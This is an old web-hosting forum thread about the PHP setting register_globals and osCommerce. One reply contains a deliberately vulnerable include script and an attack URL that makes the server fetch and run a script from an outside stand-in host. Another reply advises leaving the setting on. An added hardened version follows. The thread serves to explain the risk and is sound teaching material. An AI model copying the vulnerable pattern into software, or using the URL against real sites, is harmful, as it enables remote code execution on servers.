register_globals on or off ??

Discussion in 'General Discussion' started by ctbhost, Nov 30, 2007.

  1. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    16
    I have up until now had register_globals = on, but am now changing it to off.

    Here's my question:

    Every post I see tells me that having register_globals = on is a major security issue; however, osCommerce requires it to be on. Does this mean that osCommerce is insecure, or is having register_globals = on not such a security issue?

    I'm confused.
     
  2. cPanelDavidG

    cPanelDavidG Technical Product Specialist

    Joined:
    Nov 29, 2006
    Messages:
    11,279
    Likes Received:
    8
    Trophy Points:
    38
    Location:
    Houston, TX
    cPanel Access Level:
    Root Administrator
    Requiring register_globals is commonly accepted as being very poor programming practice among PHP coders. Enabling register_globals is a security risk from the perspective of the system administrators. In fact, some PHP apps now will refuse to function in an environment where register_globals is on due to the security risk.

    Generally the advice is that if a PHP application requires register_globals, you may want to consider another PHP application.

    Also, many PHP coders are beginning to prepare for PHP 6, where register_globals will no longer be available. If something is still requiring register_globals, it's a bit behind the times as far as PHP coding standards go.
     
  3. ctbhost

    ctbhost Well-Known Member

    Joined:
    May 31, 2002
    Messages:
    139
    Likes Received:
    0
    Trophy Points:
    16
    I would have thought osCommerce (being one of the most popular shopping carts) would have been pretty safe to use, but maybe it's not the best?
     
  4. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,384
    Likes Received:
    23
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
    I recently wrote up an article concerning this.

    In regards to osCommerce, I just think their developers have fallen asleep. Is the project even being actively developed any more?

    I would really be afraid to use osCommerce, because if they are willing to ignore the issue such as register_globals, what other issues are they ignoring? Do you really feel safe knowing that your e-commerce website is handled by such a piece of software? What if a major, major vulnerability is found in osCommerce, are they going to sit on their hands for 10 years before releasing a fix?

    This isn't to say that having register_globals disabled will instantly bring you a ton of extra security. It's also not to say that writing a script that requires register_globals to be enabled is a security flaw. But the common conception regarding register_globals is that it should be turned off. Script developers should be aware of this and should have already adjusted their scripts to function in this manner.
     
  5. twhiting9275

    twhiting9275 Well-Known Member

    Joined:
    Sep 26, 2002
    Messages:
    538
    Likes Received:
    15
    Trophy Points:
    18
    cPanel Access Level:
    Root Administrator
    Here's my 0.02:
    Globals themselves are not bad, as long as you secure them. The problem is that wannabe coders get in there and write crappy scripts cheaply, and decide 'hey, we're just not going to secure our globals at all'. This (of course) leads to hacking, problems, and just all around bad things.

    Now, should they be required on or off? Well, as of php6, you won't have a choice. Thank the gods that's not for a while, but still, it'll happen, eventually. Personally, I'm still getting ready for that day (I do use a few globals, properly secured, of course), but it'll be a bloody nightmare when everything gets there.

    Personally, I say leave 'em on, for now. When PHP makes you turn 'em off, do so, but not until. Otherwise, this will cause some HUGE problems with pretty common software.
     
  6. cPanelDavidG

    cPanelDavidG Technical Product Specialist

    Joined:
    Nov 29, 2006
    Messages:
    11,279
    Likes Received:
    8
    Trophy Points:
    38
    Location:
    Houston, TX
    cPanel Access Level:
    Root Administrator
    Note that globals (global variables) is a completely different thing from register_globals. Anyone who is spending enough time to secure their PHP scripts will likely spend a few seconds to avoid the need for register_globals.

    If you're not familiar with global variables from a programming standpoint, here's a link to the Wikipedia article on it:

    http://en.wikipedia.org/wiki/Global_variable

    In PHP, register_globals allows any parameter passed to the script to be assigned to a global variable (including overwriting the values of existing global variables, hence the danger of this setting). Let's say you have this PHP script named exploit_me.php:

    PHP:
    <?php
    // Warning: never code like this in a register_globals environment
    $include_file = "myinclude.inc";

    // Note the lack of anything polling GET or POST variables explicitly.
    include($include_file);
    Now let's say you call this URL:

    Code:
    http://yourDomain.com/exploit_me.php?include_file=http://myDomain.com/xss.php
    
    My XSS script would then run on your server since you have register_globals enabled and I'm overwriting the include_file global variable with my own data.

    While this is an obvious example, don't expect this to be as obvious in many scripts. How do people know what variables you are using? Well, most scripts people use are open source, so you can just look at the source.

    I hope this clears some misconceptions of register_globals vs. PHP global variables.
     
    #6 cPanelDavidG, Dec 3, 2007
    Last edited: Dec 3, 2007
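    The hardened counterpart of the exploit_me.php pattern above, added here as an example rather than taken from the post or from osCommerce: it refuses to run when register_globals is on, initialises the variable before use, and resolves the request parameter through an allowlist so the request never supplies a path. The parameter name "page" and the ./pages directory are assumptions.

```php
<?php
// Added example, not from the forum post. Assumes includable pages live in
// ./pages and that the request carries a "page" key, not a file path.

// 1. Refuse to run when register_globals is on, as some PHP apps do.
//    ini_get() yields "", "0" or "off" when the setting is disabled, and
//    false on PHP versions where the directive no longer exists.
if (filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN)) {
    http_response_code(500);
    exit('register_globals must be disabled in php.ini');
}

// 2. Initialise every variable before it is used, so nothing arriving with
//    the request can seed it. This is the root of the register_globals issue:
//    an uninitialised $include_file took its value from ?include_file=...
$include_file = 'myinclude.inc';

// 3. Read request input explicitly from the superglobal and map it through
//    an allowlist. The value from the client selects a key; the script, not
//    the client, decides which file that key corresponds to.
$pages = [
    'home'    => 'myinclude.inc',
    'contact' => 'contact.inc',
];
$page = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
if (!array_key_exists($page, $pages)) {
    http_response_code(404);
    exit('Unknown page');
}
$include_file = __DIR__ . '/pages/' . $pages[$page];

include $include_file;
```

    With allow_url_include left at its default of Off, PHP also refuses remote include() targets outright, which is a second, independent layer against the URL shown in the post.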
  7. bibin

    bibin Member

    Joined:
    Sep 10, 2006
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    1
  8. FreedomBI

    FreedomBI Well-Known Member

    Joined:
    Jul 7, 2008
    Messages:
    65
    Likes Received:
    0
    Trophy Points:
    6
    A while back, I had the misfortune of having to set up oscommerce for customers, including trying to integrate add-ons. The code nearly made me scream in horror.

    I have heard good stuff about Zen Cart, which I believe is similar. I haven't looked at it in depth, though. You should probably take a look at it. And if you're a Drupal fan, there's the e-Commerce modules, as well as the Ubercart system.
     